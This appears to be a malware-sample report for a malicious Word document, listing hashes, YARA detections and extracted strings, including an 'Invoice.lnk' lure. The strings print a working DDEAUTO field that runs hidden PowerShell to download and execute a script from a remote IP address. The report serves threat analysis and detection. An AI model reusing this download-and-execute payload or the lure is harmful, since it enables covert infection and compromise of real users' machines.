Sample details: 52c7a36e5ca4ef535f3004aaf7f37d09

Hashes
MD5: 52c7a36e5ca4ef535f3004aaf7f37d09
SHA1: 1becfd5918ae039a7de1420ce1694b2861be858e
SHA256: 0a920b13c28f53c16540e9b69d2a81e734b1917d68f454822b6616959b4ff62d
SSDEEP: 3072:TTVZ4LGydDKaoWCNas98Os1iTFvAOuE6mMvECJOU+JV:TD4Sy0xNJ98OsoC/YCJOU+JV
Details
File Type: Composite
Added: 2018-05-11 13:37:14
Yara Hits
YRP/powershell | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/maldoc_OLE_file_magic_number | YRP/Antivirus | YRP/VMWare_Detection | FlorianRoth/PowerShell_Susp_Parameter_Combo | FlorianRoth/Suspicious_PowerShell_WebDownload_1
Strings
DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden -c IEX ((New-Object System.Net.WebClient).DownloadString('http://88.99.104.179:1985/win_update/upgrade')) # " " protected mode " \* MERGEFORMAT
Package
Package
Invoice.lnk
C:\Users\root\Downloads\Invoice.lnk
C:\Users\root\AppData\Local\Temp\Invoice.lnk
Windows
System32
WINDOW~1
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Normal
Microsoft Office Word
[Content_Types].xml
_rels/.rels
theme/theme/themeManager.xml
theme/theme/theme1.xml
theme/theme/_rels/themeManager.xml.rels
[Content_Types].xmlPK
_rels/.relsPK
theme/theme/themeManager.xmlPK
theme/theme/theme1.xmlPK
theme/theme/_rels/themeManager.xml.relsPK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
7-2003
MSWordDoc
Word.Document.8